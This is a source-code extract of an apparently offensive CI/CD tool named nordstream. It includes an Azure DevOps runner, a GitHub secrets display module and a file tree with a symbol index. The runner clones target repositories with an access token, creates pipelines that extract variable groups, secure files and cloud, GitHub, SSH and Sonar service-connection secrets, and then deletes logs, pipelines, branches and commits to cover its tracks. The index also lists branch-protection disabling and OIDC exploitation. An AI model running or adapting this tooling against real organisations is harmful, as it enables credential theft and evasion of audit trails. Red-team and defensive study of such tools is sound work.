if self._extractAzureServiceconnections and scType == "azurerm":
self.__extractAzureRMSecrets(projectId, pipelineId, sc)
elif self._extractGitHubServiceconnections and scType == "github":
self.__extractGitHubSecrets(projectId, pipelineId, sc)
elif self._extractAWSServiceconnections and scType == "aws":
self.__extractAWSSecrets(projectId, pipelineId, sc)
elif self._extractSonarServiceconnections and scType == "sonarqube":
self.__extractSonarSecrets(projectId, pipelineId, sc)
elif self._extractSSHServiceConnections and scType == "ssh":
self.__extractSSHSecrets(projectId, pipelineId, sc)
def manualCleanLogs(self):
logger.info("Deleting logs")
for project in self._cicd.projects:
projectId = project.get("id")
logger.info(f"Cleaning logs for project: {projectId}")
self._cicd.cleanAllLogs(projectId)
def __runSecretsExtractionPipeline(self, projectId, pipelineId):
if self._extractVariableGroups:
self.__extractVariableGroupsSecrets(projectId, pipelineId)
if self._extractSecureFiles:
self.__extractSecureFiles(projectId, pipelineId)
if (
self._extractAzureServiceconnections
or self._extractGitHubServiceconnections
or self._extractAWSServiceconnections
or self._extractSonarServiceconnections
or self._extractSSHServiceConnections
):
self.__extractServiceConnectionsSecrets(projectId, pipelineId)
def __pushEmptyFile(self):
Git.gitCreateDummyFile("README.md")
diffOutput = Git.gitDiffFile("README.md")
stdout, stderr = diffOutput.communicate()
if stdout == b"":
logger.verbose(f"README.md file not modified.")
else:
logger.verbose(f"README.md file is modified, incrementing commit count.")
self._pushedCommitsCount += 1
pushOutput = Git.gitPush(self._cicd.branchName)
pushOutput.wait()
try:
if pushOutput.returncode != 0:
logger.error("Error when pushing code:")
logger.raw(pushOutput.communicate()[1], logging.INFO)
else:
logger.raw(pushOutput.communicate()[1])
except Exception as e:
logger.exception(e)
def __createRemoteRepo(self, projectId):
repo = self._cicd.createGit(projectId)
if repo.get("id"):
repoId = repo.get("id")
logger.info(f'New remote repository created: "{self._cicd.repoName}" / "{repoId}"')
return repo
else:
return None
def __getRemoteRepo(self, projectId):
for repo in self._cicd.listRepositories(projectId):
if self._cicd.repoName == repo.get("name"):
return repo, False
repo = self.__createRemoteRepo(projectId)
if repo != None:
return repo, True
raise RepoCreationError("No repo found")
def __deleteRemoteBranch(self):
logger.verbose("Deleting remote branch")
deleteOutput = Git.gitDeleteRemote(self._cicd.branchName)
deleteOutput.wait()
if deleteOutput.returncode != 0:
logger.error(f"Error deleting remote branch {self._cicd.branchName}")
logger.raw(deleteOutput.communicate()[1], logging.INFO)
return False
return True
def __clean(self, projectId, repoId, deleteRemoteRepo, deleteRemotePipeline):
if self._cleanLogs:
if deleteRemotePipeline:
logger.verbose("Deleting remote pipeline.")
self._cicd.deletePipeline(projectId)
if deleteRemoteRepo:
logger.verbose("Deleting remote repository.")
self._cicd.deleteGit(projectId, repoId)
else:
if self._pushedCommitsCount > 0:
if self._cleanLogs:
logger.info(f"Cleaning logs for project: {projectId}")
self._cicd.cleanAllLogs(projectId)
logger.verbose("Cleaning commits.")
if self._branchAlreadyExists and self._cicd.branchName != self._cicd.defaultBranchName:
Git.gitUndoLastPushedCommits(self._cicd.branchName, self._pushedCommitsCount)
else:
if not self.__deleteRemoteBranch():
logger.info("Cleaning remote branch.")
# rm everything if we can't delete the branch (only leave one file otherwise it will try to rm the branch)
Git.gitCleanRemote(self._cicd.branchName, leaveOneFile=True)
def __createPipeline(self, projectId, repoId):
logger.info("Getting pipeline")
self.__pushEmptyFile()
for pipeline in self._cicd.listPipelines(projectId):
if pipeline.get("name") == self._cicd.pipelineName:
return pipeline.get("id"), False
pipelineId = self._cicd.createPipeline(projectId, repoId, f"{self._pipelineFilename}")
if pipelineId:
return pipelineId, True
else:
raise Exception("unable to create a pipeline")
def __runCustomPipeline(self, projectId, pipelineId):
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.loadFile(self._yaml)
logger.info("Running arbitrary pipeline")
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId)
logger.empty_line()
def runPipeline(self):
for project in self._cicd.projects:
projectId = project.get("id")
repoId = None
deleteRemoteRepo = False
deleteRemotePipeline = False
# skip if no secrets
if not self._yaml:
if not self.__checkSecrets(project):
continue
try:
# Create or get first repo of the project
repo, deleteRemoteRepo = self.__getRemoteRepo(projectId)
repoId = repo.get("id")
self._cicd.repoName = repo.get("name")
logger.info(f'Getting remote repository: "{self._cicd.repoName}" /' f' "{repoId}"')
url = f"https://foo:{self._cicd.token}@dev.azure.com/{self._cicd.org}/{projectId}/_git/{self._cicd.repoName}"
if not Git.gitClone(url):
raise GitError("Fail to clone the repository")
chdir(self._cicd.repoName)
self._branchAlreadyExists = Git.gitRemoteBranchExists(self._cicd.branchName)
Git.gitInitialization(self._cicd.branchName, branchAlreadyExists=self._branchAlreadyExists)
pipelineId, deleteRemotePipeline = self.__createPipeline(projectId, repoId)
if self._yaml:
self.__runCustomPipeline(projectId, pipelineId)
else:
self.__runSecretsExtractionPipeline(projectId, pipelineId)
except (GitError, RepoCreationError) as e:
name = project.get("name")
logger.error(f"Error in project {name}: {e}")
except KeyboardInterrupt:
self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline)
chdir("../")
subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait()
except Exception as e:
logger.error(f"Error during pipeline run: {e}")
if logger.getEffectiveLevel() == logging.DEBUG:
logger.exception(e)
self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline)
chdir("../")
subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait()
else:
self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline)
chdir("../")
subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait()
def describeToken(self):
response = self._cicd.getUser()
logger.info("Token information:")
username = response.get("authenticatedUser").get("properties").get("Account").get("$value")
if username != "":
logger.raw(f"\t- Username: {username}\n", logging.INFO)
id = response.get("authenticatedUser").get("id")
if id != "":
logger.raw(f"\t- Id: {id}\n", logging.INFO)
def __checkRunErrors(self, run):
if run.get("customProperties") != None:
validationResults = run.get("customProperties").get("ValidationResults", [])
msg = ""
for res in validationResults:
if res.get("result", "") == "error":
if "Verify the name and credentials being used" in res.get("message", ""):
raise DevOpsError("The stored token is not valid anymore.")
msg += res.get("message", "") + "\n"
raise DevOpsError(msg)
def parseExtractList(self, extractList, allow=True):
extractList = extractList.split(",") if extractList else []
self._extractVariableGroups = isAllowed("vg", extractList, allow)
self._extractSecureFiles = isAllowed("sf", extractList, allow)
self._extractAzureServiceconnections = isAllowed("az", extractList, allow)
self._extractGitHubServiceconnections = isAllowed("gh", extractList, allow)
self._extractAWSServiceconnections = isAllowed("aws", extractList, allow)
self._extractSonarServiceconnections = isAllowed("sonar", extractList, allow)
self._extractSSHServiceConnections = isAllowed("ssh", extractList, allow)
================================================
FILE: nordstream/core/github/display.py
================================================
from nordstream.utils.log import logger
import logging
from nordstream.core.github.protections import getUsersArray, getTeamsOrAppsArray
def displayRepoSecrets(secrets):
if len(secrets) != 0:
logger.info("Repo secrets:")
for secret in secrets:
logger.raw(f"\t- {secret}\n", logging.INFO)
def displayDependabotRepoSecrets(secrets):
if len(secrets) != 0:
logger.info("Dependabot repo secrets:")
for secret in secrets:
logger.raw(f"\t- {secret}\n", logging.INFO)
def displayEnvSecrets(env, secrets):
if len(secrets) != 0:
logger.info(f"{env} secrets:")
for secret in secrets:
logger.raw(f"\t- {secret}\n", logging.INFO)
def displayOrgSecrets(secrets):
if len(secrets) != 0:
logger.info("Repository organization secrets:")
for secret in secrets:
logger.raw(f"\t- {secret}\n", logging.INFO)
def displayDependabotOrgSecrets(secrets):
if len(secrets) != 0:
logger.info("Dependabot organization secrets:")
for secret in secrets:
logger.raw(f"\t- {secret}\n", logging.INFO)
def displayEnvSecurity(envDetails):
protectionRules = envDetails.get("protection_rules")
envName = envDetails.get("name")
if len(protectionRules) > 0:
logger.info(f'Environment protection for: "{envName}":')
for protection in protectionRules:
if protection.get("type") == "required_reviewers":
for reviewer in protection.get("reviewers"):
reviewerType = reviewer.get("type")
login = reviewer.get("reviewer").get("login")
userId = reviewer.get("reviewer").get("id")
logger.raw(
f"\t- reviewer ({reviewerType}): {login}/{userId}\n",
logging.INFO,
)
elif protection.get("type") == "wait_timer":
wait = protection.get("wait_timer")
logger.raw(f"\t- timer: {wait} min\n", logging.INFO)
else:
branchPolicy = envDetails.get("deployment_branch_policy")
if branchPolicy.get("custom_branch_policies", False):
logger.raw(f"\t- deployment branch policy: custom\n", logging.INFO)
else:
logger.raw(f"\t- deployment branch policy: protected\n", logging.INFO)
else:
logger.info(f'No environment protection rule found for: "{envName}"')
def displayBranchProtectionRules(protections):
logger.info("Branch protections:")
logger.raw(
f'\t- enforce admins: {protections.get("enforce_admins").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- block creations:" f' {protections.get("block_creations").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- required signatures:" f' {protections.get("required_signatures").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- allow force pushes:" f' {protections.get("allow_force_pushes").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- allow deletions:" f' {protections.get("allow_deletions").get("enabled")}\n',
logging.INFO,
)
if protections.get("restrictions"):
displayRestrictions(protections.get("restrictions"))
if protections.get("required_pull_request_reviews"):
displayRequiredPullRequestReviews(protections.get("required_pull_request_reviews"))
else:
logger.raw(f"\t- required pull request reviews: False\n", logging.INFO)
if protections.get("required_status_checks"):
displayRequiredStatusChecks(protections.get("required_status_checks"))
logger.raw(
"\t- required linear history:" f' {protections.get("required_linear_history").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- required conversation resolution:"
f' {protections.get("required_conversation_resolution").get("enabled")}\n',
logging.INFO,
)
logger.raw(
f'\t- lock branch: {protections.get("lock_branch").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- allow fork syncing:" f' {protections.get("allow_fork_syncing").get("enabled")}\n',
logging.INFO,
)
def displayRequiredStatusChecks(data):
logger.raw(f"\t- required status checks:\n", logging.INFO)
logger.raw(f'\t - strict: {data.get("strict")}\n', logging.INFO)
if len(data.get("contexts")) != 0:
logger.raw(f'\t - contexts: {data.get("contexts")}\n', logging.INFO)
if len(data.get("checks")) != 0:
logger.raw(f'\t - checks: {data.get("checks")}\n', logging.INFO)
def displayRequiredPullRequestReviews(data):
logger.raw(f"\t- pull request reviews:\n", logging.INFO)
logger.raw(f'\t - approving review count: {data.get("required_approving_review_count")}\n', logging.INFO)
logger.raw(f'\t - require code owner reviews: {data.get("require_code_owner_reviews")}\n', logging.INFO)
logger.raw(f'\t - require last push approval: {data.get("require_last_push_approval")}\n', logging.INFO)
logger.raw(f'\t - dismiss stale reviews: {data.get("dismiss_stale_reviews")}\n', logging.INFO)
if data.get("dismissal_restrictions"):
users = getUsersArray(data.get("dismissal_restrictions").get("users"))
teams = getTeamsOrAppsArray(data.get("dismissal_restrictions").get("teams"))
apps = getTeamsOrAppsArray(data.get("dismissal_restrictions").get("apps"))
if len(users) != 0 or len(teams) != 0 or len(apps) != 0:
logger.raw(f"\t - dismissal_restrictions:\n", logging.INFO)
if len(users) != 0:
logger.raw(f"\t - users: {users}\n", logging.INFO)
if len(teams) != 0:
logger.raw(f"\t - teams: {teams}\n", logging.INFO)
if len(apps) != 0:
logger.raw(f"\t - apps: {apps}\n", logging.INFO)
if data.get("bypass_pull_request_allowances"):
users = getUsersArray(data.get("bypass_pull_request_allowances").get("users"))
teams = getTeamsOrAppsArray(data.get("bypass_pull_request_allowances").get("teams"))
apps = getTeamsOrAppsArray(data.get("bypass_pull_request_allowances").get("apps"))
if len(users) != 0 or len(teams) != 0 or len(apps) != 0:
logger.raw(f"\t - bypass pull request allowances:\n", logging.INFO)
if len(users) != 0:
logger.raw(f"\t - users: {users}\n", logging.INFO)
if len(teams) != 0:
logger.raw(f"\t - teams: {teams}\n", logging.INFO)
if len(apps) != 0:
logger.raw(f"\t - apps: {apps}\n", logging.INFO)
def displayRestrictions(data):
users = getUsersArray(data.get("users"))
teams = getTeamsOrAppsArray(data.get("teams"))
apps = getTeamsOrAppsArray(data.get("apps"))
if len(users) != 0 or len(teams) != 0 or len(apps) != 0:
logger.raw(f"\t- person allowed to push to restrict
gitextract_yz6qr87i/ ├── .github/ │ └── ISSUE_TEMPLATE/ │ ├── bug_report.md │ └── feature_request.md ├── .gitignore ├── .pre-commit-config.yaml ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── nordstream/ │ ├── __main__.py │ ├── cicd/ │ │ ├── devops.py │ │ ├── github.py │ │ └── gitlab.py │ ├── commands/ │ │ ├── devops.py │ │ ├── github.py │ │ └── gitlab.py │ ├── core/ │ │ ├── devops/ │ │ │ └── devops.py │ │ ├── github/ │ │ │ ├── display.py │ │ │ ├── github.py │ │ │ └── protections.py │ │ └── gitlab/ │ │ └── gitlab.py │ ├── git.py │ ├── utils/ │ │ ├── constants.py │ │ ├── devops.py │ │ ├── errors.py │ │ ├── helpers.py │ │ └── log.py │ └── yaml/ │ ├── custom.py │ ├── devops.py │ ├── generator.py │ ├── github.py │ └── gitlab.py ├── pyproject.toml └── requirements.txt
SYMBOL INDEX (422 symbols across 22 files)
FILE: nordstream/__main__.py
function main (line 24) | def main():
FILE: nordstream/cicd/devops.py
class DevOps (line 15) | class DevOps:
method __init__ (line 37) | def __init__(self, token, org, verifCert):
method projects (line 47) | def projects(self):
method org (line 51) | def org(self):
method branchName (line 55) | def branchName(self):
method branchName (line 59) | def branchName(self, value):
method repoName (line 63) | def repoName(self):
method repoName (line 67) | def repoName(self, value):
method pipelineName (line 71) | def pipelineName(self):
method pipelineName (line 75) | def pipelineName(self, value):
method defaultAgentPool (line 79) | def defaultAgentPool(self):
method defaultAgentPool (line 83) | def defaultAgentPool(self, value):
method sleepTime (line 87) | def sleepTime(self):
method sleepTime (line 91) | def sleepTime(self, value):
method token (line 95) | def token(self):
method outputDir (line 99) | def outputDir(self):
method outputDir (line 103) | def outputDir(self, value):
method defaultPipelineName (line 107) | def defaultPipelineName(self):
method defaultBranchName (line 111) | def defaultBranchName(self):
method __getLogin (line 114) | def __getLogin(self):
method getUser (line 117) | def getUser(self):
method setCookiesAndHeaders (line 123) | def setCookiesAndHeaders(self):
method listProjects (line 130) | def listProjects(self):
method listUsers (line 149) | def listUsers(self):
method filterWriteProjects (line 182) | def filterWriteProjects(self):
method __checkProjectPrivs (line 218) | def __checkProjectPrivs(self, login, projectName, group):
method listRepositories (line 249) | def listRepositories(self, project):
method listPipelines (line 256) | def listPipelines(self, project):
method addProject (line 263) | def addProject(self, project):
method checkToken (line 275) | def checkToken(cls, token, org, verifCert):
method listProjectVariableGroupsSecrets (line 291) | def listProjectVariableGroupsSecrets(self, project):
method listProjectSecureFiles (line 314) | def listProjectSecureFiles(self, project):
method authorizePipelineForResourceAccess (line 332) | def authorizePipelineForResourceAccess(self, projectId, pipelineId, re...
method createGit (line 359) | def createGit(self, project):
method deleteGit (line 369) | def deleteGit(self, project, repoId):
method createPipeline (line 376) | def createPipeline(self, project, repoId, path):
method runPipeline (line 433) | def runPipeline(self, project, pipelineId):
method __getBuilds (line 447) | def __getBuilds(self, project):
method __getBuildSources (line 458) | def __getBuildSources(self, project, buildId):
method getRunId (line 464) | def getRunId(self, project, pipelineId):
method waitPipeline (line 492) | def waitPipeline(self, project, pipelineId, runId):
method __createPipelineOutputDir (line 513) | def __createPipelineOutputDir(self, projectName):
method downloadPipelineOutput (line 516) | def downloadPipelineOutput(self, projectId, runId):
method __cleanRunLogs (line 575) | def __cleanRunLogs(self, projectId):
method __cleanPipeline (line 596) | def __cleanPipeline(self, projectId):
method deletePipeline (line 610) | def deletePipeline(self, projectId):
method cleanAllLogs (line 625) | def cleanAllLogs(self, projectId):
method listServiceConnections (line 628) | def listServiceConnections(self, projectId):
method getFailureReason (line 645) | def getFailureReason(self, projectId, runId):
method getOrgs (line 667) | def getOrgs(cls, token):
FILE: nordstream/cicd/github.py
class GitHub (line 11) | class GitHub:
method __init__ (line 30) | def __init__(self, token):
method checkToken (line 40) | def checkToken(token):
method token (line 51) | def token(self):
method org (line 55) | def org(self):
method org (line 59) | def org(self, org):
method defaultBranchName (line 63) | def defaultBranchName(self):
method branchName (line 67) | def branchName(self):
method branchName (line 71) | def branchName(self, value):
method repos (line 75) | def repos(self):
method outputDir (line 79) | def outputDir(self):
method outputDir (line 83) | def outputDir(self, value):
method __getLogin (line 86) | def __getLogin(self):
method getUser (line 89) | def getUser(self):
method getLoginWithGraphQL (line 93) | def getLoginWithGraphQL(self):
method __paginatedGet (line 103) | def __paginatedGet(self, url, data="", maxData=0):
method listRepos (line 141) | def listRepos(self):
method addRepo (line 159) | def addRepo(self, repo):
method listEnvFromrepo (line 184) | def listEnvFromrepo(self, repo):
method listSecretsFromEnv (line 193) | def listSecretsFromEnv(self, repo, env):
method listSecretsFromRepo (line 205) | def listSecretsFromRepo(self, repo):
method listOrganizationSecretsFromRepo (line 215) | def listOrganizationSecretsFromRepo(self, repo):
method listDependabotSecretsFromRepo (line 225) | def listDependabotSecretsFromRepo(self, repo):
method listDependabotOrganizationSecrets (line 235) | def listDependabotOrganizationSecrets(self):
method listEnvProtections (line 245) | def listEnvProtections(self, repo, env):
method getEnvDetails (line 261) | def getEnvDetails(self, repo, env):
method createDeploymentBranchPolicy (line 273) | def createDeploymentBranchPolicy(self, repo, env):
method deleteDeploymentBranchPolicy (line 292) | def deleteDeploymentBranchPolicy(self, repo, env):
method disableBranchProtectionRules (line 318) | def disableBranchProtectionRules(self, repo):
method modifyEnvProtectionRules (line 342) | def modifyEnvProtectionRules(self, repo, env, wait, reviewers, branchP...
method deleteDeploymentBranchPolicyForAllEnv (line 360) | def deleteDeploymentBranchPolicyForAllEnv(self, repo):
method checkBranchProtectionRules (line 365) | def checkBranchProtectionRules(self, repo):
method getBranchesProtectionRules (line 375) | def getBranchesProtectionRules(self, repo):
method updateBranchesProtectionRules (line 386) | def updateBranchesProtectionRules(self, repo, protections):
method cleanDeploymentsLogs (line 398) | def cleanDeploymentsLogs(self, repo):
method cleanRunLogs (line 435) | def cleanRunLogs(self, repo, workflowFilename):
method cleanAllLogs (line 514) | def cleanAllLogs(self, repo, workflowFilename):
method createWorkflowOutputDir (line 519) | def createWorkflowOutputDir(self, repo):
method waitWorkflow (line 523) | def waitWorkflow(self, repo, workflowFilename):
method downloadWorkflowOutput (line 568) | def downloadWorkflowOutput(self, repo, name, workflowId):
method getFailureReason (line 583) | def getFailureReason(self, repo, workflowId):
method filterWriteRepos (line 609) | def filterWriteRepos(self):
method isGHSToken (line 619) | def isGHSToken(self):
FILE: nordstream/cicd/gitlab.py
class GitLab (line 16) | class GitLab:
method __init__ (line 33) | def __init__(self, url, token, verifCert):
method projects (line 42) | def projects(self):
method groups (line 46) | def groups(self):
method token (line 50) | def token(self):
method url (line 54) | def url(self):
method outputDir (line 58) | def outputDir(self):
method outputDir (line 62) | def outputDir(self, value):
method defaultBranchName (line 66) | def defaultBranchName(self):
method branchName (line 70) | def branchName(self):
method branchName (line 74) | def branchName(self, value):
method checkToken (line 78) | def checkToken(cls, token, gitlabURL, verifyCert):
method __getLogin (line 104) | def __getLogin(self):
method getUser (line 108) | def getUser(self):
method setCookiesAndHeaders (line 113) | def setCookiesAndHeaders(self):
method __paginatedGet (line 121) | def __paginatedGet(self, url, params={}):
method listRunnersFromProject (line 147) | def listRunnersFromProject(self, project):
method listVariablesFromProject (line 193) | def listVariablesFromProject(self, project):
method listInheritedVariablesFromProject (line 222) | def listInheritedVariablesFromProject(self, project):
method listSecureFilesFromProject (line 282) | def listSecureFilesFromProject(self, project):
method listVariablesFromGroup (line 319) | def listVariablesFromGroup(self, group):
method listVariablesFromInstance (line 348) | def listVariablesFromInstance(self):
method addProjects (line 375) | def addProjects(self, project=None, filterWrite=False, strict=False, m...
method addGroups (line 414) | def addGroups(self, group=None):
method listUsers (line 439) | def listUsers(self):
method __createOutputDir (line 463) | def __createOutputDir(self, name):
method waitPipeline (line 469) | def waitPipeline(self, projectId):
method __getJobs (line 497) | def __getJobs(self, projectId, pipelineId):
method downloadPipelineOutput (line 509) | def downloadPipelineOutput(self, project, pipelineId):
method __getTraceForJobId (line 540) | def __getTraceForJobId(self, projectId, jobId):
method __deletePipeline (line 557) | def __deletePipeline(self, projectId):
method cleanAllLogs (line 602) | def cleanAllLogs(self, projectId):
method __cleanEvents (line 607) | def __cleanEvents(self, projectId):
method getBranchesProtectionRules (line 631) | def getBranchesProtectionRules(self, projectId):
method getBranches (line 641) | def getBranches(self, projectId):
method getProject (line 663) | def getProject(self, projectId):
method getFailureReasonPipeline (line 673) | def getFailureReasonPipeline(self, projectId, pipelineId):
method getFailureReasonJobs (line 679) | def getFailureReasonJobs(self, projectId, pipelineId):
FILE: nordstream/commands/devops.py
function start (line 75) | def start(argv):
FILE: nordstream/commands/github.py
function start (line 73) | def start(argv):
FILE: nordstream/commands/gitlab.py
function start (line 65) | def start(argv):
FILE: nordstream/core/devops/devops.py
class DevOpsRunner (line 15) | class DevOpsRunner:
method __init__ (line 36) | def __init__(self, cicd):
method extractVariableGroups (line 41) | def extractVariableGroups(self):
method extractVariableGroups (line 45) | def extractVariableGroups(self, value):
method extractSecureFiles (line 49) | def extractSecureFiles(self):
method extractSecureFiles (line 53) | def extractSecureFiles(self, value):
method extractAzureServiceconnections (line 57) | def extractAzureServiceconnections(self):
method extractAzureServiceconnections (line 61) | def extractAzureServiceconnections(self, value):
method extractGitHubServiceconnections (line 65) | def extractGitHubServiceconnections(self):
method extractGitHubServiceconnections (line 69) | def extractGitHubServiceconnections(self, value):
method extractAWSServiceconnections (line 73) | def extractAWSServiceconnections(self):
method extractAWSServiceconnections (line 77) | def extractAWSServiceconnections(self, value):
method extractSonarerviceconnections (line 81) | def extractSonarerviceconnections(self):
method extractSonarerviceconnections (line 85) | def extractSonarerviceconnections(self, value):
method extractSSHServiceConnections (line 89) | def extractSSHServiceConnections(self):
method extractSSHServiceConnections (line 93) | def extractSSHServiceConnections(self, value):
method output (line 97) | def output(self):
method output (line 101) | def output(self, value):
method cleanLogs (line 105) | def cleanLogs(self):
method cleanLogs (line 109) | def cleanLogs(self, value):
method yaml (line 113) | def yaml(self):
method yaml (line 117) | def yaml(self, value):
method pipelineFilename (line 121) | def pipelineFilename(self):
method pipelineFilename (line 125) | def pipelineFilename(self, value):
method writeAccessFilter (line 129) | def writeAccessFilter(self):
method writeAccessFilter (line 133) | def writeAccessFilter(self, value):
method poolName (line 137) | def poolName(self):
method poolName (line 141) | def poolName(self, value):
method os (line 145) | def os(self):
method os (line 149) | def os(self, value):
method __createLogDir (line 152) | def __createLogDir(self):
method listDevOpsProjects (line 156) | def listDevOpsProjects(self):
method listDevOpsRepositories (line 162) | def listDevOpsRepositories(self):
method listDevOpsUsers (line 170) | def listDevOpsUsers(self):
method getProjects (line 184) | def getProjects(self, project):
method listProjectSecrets (line 205) | def listProjectSecrets(self):
method __displayProjectVariableGroupsSecrets (line 216) | def __displayProjectVariableGroupsSecrets(self, project):
method __displayProjectSecureFiles (line 230) | def __displayProjectSecureFiles(self, project):
method __displayServiceConnections (line 241) | def __displayServiceConnections(self, projectId):
method __checkSecrets (line 255) | def __checkSecrets(self, project):
method createYaml (line 292) | def createYaml(self, pipelineType):
method __extractPipelineOutput (line 311) | def __extractPipelineOutput(self, projectId, resType=0, resultsFilenam...
method __extractGitHubResults (line 338) | def __extractGitHubResults(output):
method __doubleb64 (line 349) | def __doubleb64(output):
method __azureRm (line 355) | def __azureRm(output):
method __launchPipeline (line 360) | def __launchPipeline(self, project, pipelineId, pipelineGenerator):
method __displayFailureReasons (line 403) | def __displayFailureReasons(self, projectId, runId):
method __extractVariableGroupsSecrets (line 408) | def __extractVariableGroupsSecrets(self, projectId, pipelineId):
method __extractSecureFiles (line 444) | def __extractSecureFiles(self, projectId, pipelineId):
method __extractGitHubSecrets (line 485) | def __extractGitHubSecrets(self, projectId, pipelineId, sc):
method __extractAzureRMSecrets (line 500) | def __extractAzureRMSecrets(self, projectId, pipelineId, sc):
method __extractAWSSecrets (line 519) | def __extractAWSSecrets(self, projectId, pipelineId, sc):
method __extractSonarSecrets (line 540) | def __extractSonarSecrets(self, projectId, pipelineId, sc):
method __extractSSHSecrets (line 555) | def __extractSSHSecrets(self, projectId, pipelineId, sc):
method __extractServiceConnectionsSecrets (line 570) | def __extractServiceConnectionsSecrets(self, projectId, pipelineId):
method manualCleanLogs (line 599) | def manualCleanLogs(self):
method __runSecretsExtractionPipeline (line 606) | def __runSecretsExtractionPipeline(self, projectId, pipelineId):
method __pushEmptyFile (line 622) | def __pushEmptyFile(self):
method __createRemoteRepo (line 645) | def __createRemoteRepo(self, projectId):
method __getRemoteRepo (line 654) | def __getRemoteRepo(self, projectId):
method __deleteRemoteBranch (line 665) | def __deleteRemoteBranch(self):
method __clean (line 676) | def __clean(self, projectId, repoId, deleteRemoteRepo, deleteRemotePip...
method __createPipeline (line 702) | def __createPipeline(self, projectId, repoId):
method __runCustomPipeline (line 716) | def __runCustomPipeline(self, projectId, pipelineId):
method runPipeline (line 729) | def runPipeline(self):
method describeToken (line 788) | def describeToken(self):
method __checkRunErrors (line 800) | def __checkRunErrors(self, run):
method parseExtractList (line 815) | def parseExtractList(self, extractList, allow=True):
FILE: nordstream/core/github/display.py
function displayRepoSecrets (line 6) | def displayRepoSecrets(secrets):
function displayDependabotRepoSecrets (line 13) | def displayDependabotRepoSecrets(secrets):
function displayEnvSecrets (line 20) | def displayEnvSecrets(env, secrets):
function displayOrgSecrets (line 27) | def displayOrgSecrets(secrets):
function displayDependabotOrgSecrets (line 34) | def displayDependabotOrgSecrets(secrets):
function displayEnvSecurity (line 41) | def displayEnvSecurity(envDetails):
function displayBranchProtectionRules (line 70) | def displayBranchProtectionRules(protections):
function displayRequiredStatusChecks (line 124) | def displayRequiredStatusChecks(data):
function displayRequiredPullRequestReviews (line 136) | def displayRequiredPullRequestReviews(data):
function displayRestrictions (line 175) | def displayRestrictions(data):
FILE: nordstream/core/github/github.py
class GitHubWorkflowRunner (line 23) | class GitHubWorkflowRunner:
method __init__ (line 46) | def __init__(self, cicd, env):
method extractRepo (line 52) | def extractRepo(self):
method extractRepo (line 56) | def extractRepo(self, value):
method extractEnv (line 60) | def extractEnv(self):
method extractEnv (line 64) | def extractEnv(self, value):
method extractOrg (line 68) | def extractOrg(self):
method extractOrg (line 72) | def extractOrg(self, value):
method workflowFilename (line 76) | def workflowFilename(self):
method workflowFilename (line 80) | def workflowFilename(self, value):
method yaml (line 84) | def yaml(self):
method yaml (line 88) | def yaml(self, value):
method exploitOIDC (line 92) | def exploitOIDC(self):
method exploitOIDC (line 96) | def exploitOIDC(self, value):
method tenantId (line 100) | def tenantId(self):
method tenantId (line 104) | def tenantId(self, value):
method subscriptionId (line 108) | def subscriptionId(self):
method subscriptionId (line 112) | def subscriptionId(self, value):
method clientId (line 116) | def clientId(self):
method clientId (line 120) | def clientId(self, value):
method role (line 124) | def role(self):
method role (line 128) | def role(self, value):
method region (line 132) | def region(self):
method region (line 136) | def region(self, value):
method disableProtections (line 140) | def disableProtections(self):
method disableProtections (line 144) | def disableProtections(self, value):
method writeAccessFilter (line 148) | def writeAccessFilter(self):
method writeAccessFilter (line 152) | def writeAccessFilter(self, value):
method branchAlreadyExists (line 156) | def branchAlreadyExists(self):
method branchAlreadyExists (line 160) | def branchAlreadyExists(self, value):
method pushedCommitsCount (line 164) | def pushedCommitsCount(self):
method pushedCommitsCount (line 168) | def pushedCommitsCount(self, value):
method forceDeploy (line 172) | def forceDeploy(self):
method forceDeploy (line 176) | def forceDeploy(self, value):
method cleanLogs (line 180) | def cleanLogs(self):
method cleanLogs (line 184) | def cleanLogs(self, value):
method __createLogDir (line 187) | def __createLogDir(self):
method __createWorkflowDir (line 192) | def __createWorkflowDir():
method __extractWorkflowOutput (line 195) | def __extractWorkflowOutput(self, repo):
method __extractSensitiveInformationFromWorkflowResult (line 200) | def __extractSensitiveInformationFromWorkflowResult(self, repo, inform...
method __getWorkflowOutputFileName (line 217) | def __getWorkflowOutputFileName(self, repo):
method __displayCustomWorkflowOutput (line 230) | def __displayCustomWorkflowOutput(self, repo):
method createYaml (line 240) | def createYaml(self, repo, workflowType):
method __extractSecretsFromRepo (line 271) | def __extractSecretsFromRepo(self, repo):
method __extractSecretsFromSingleEnv (line 299) | def __extractSecretsFromSingleEnv(self, repo, env):
method __extractSecretsFromAllEnv (line 320) | def __extractSecretsFromAllEnv(self, repo):
method __extractSecretsFromEnv (line 324) | def __extractSecretsFromEnv(self, repo):
method __generateAndLaunchWorkflow (line 330) | def __generateAndLaunchWorkflow(self, repo, workflowGenerator, outputN...
method __launchWorkflow (line 374) | def __launchWorkflow(self, repo, workflowGenerator):
method __postProcessingWorkflow (line 400) | def __postProcessingWorkflow(self, repo, workflowId, workflowConclusio...
method listGitHubRepos (line 419) | def listGitHubRepos(self):
method listGitHubSecrets (line 424) | def listGitHubSecrets(self):
method __displayRepoSecrets (line 441) | def __displayRepoSecrets(self, repo):
method __displayEnvSecrets (line 452) | def __displayEnvSecrets(self, repo):
method __displayOrgSecrets (line 468) | def __displayOrgSecrets(self, repo):
method __displayDependabotOrgSecrets (line 476) | def __displayDependabotOrgSecrets(self):
method getRepos (line 484) | def getRepos(self, repo):
method manualCleanLogs (line 511) | def manualCleanLogs(self):
method manualCleanBranchPolicy (line 516) | def manualCleanBranchPolicy(self):
method __runCustomWorkflow (line 521) | def __runCustomWorkflow(self, repo):
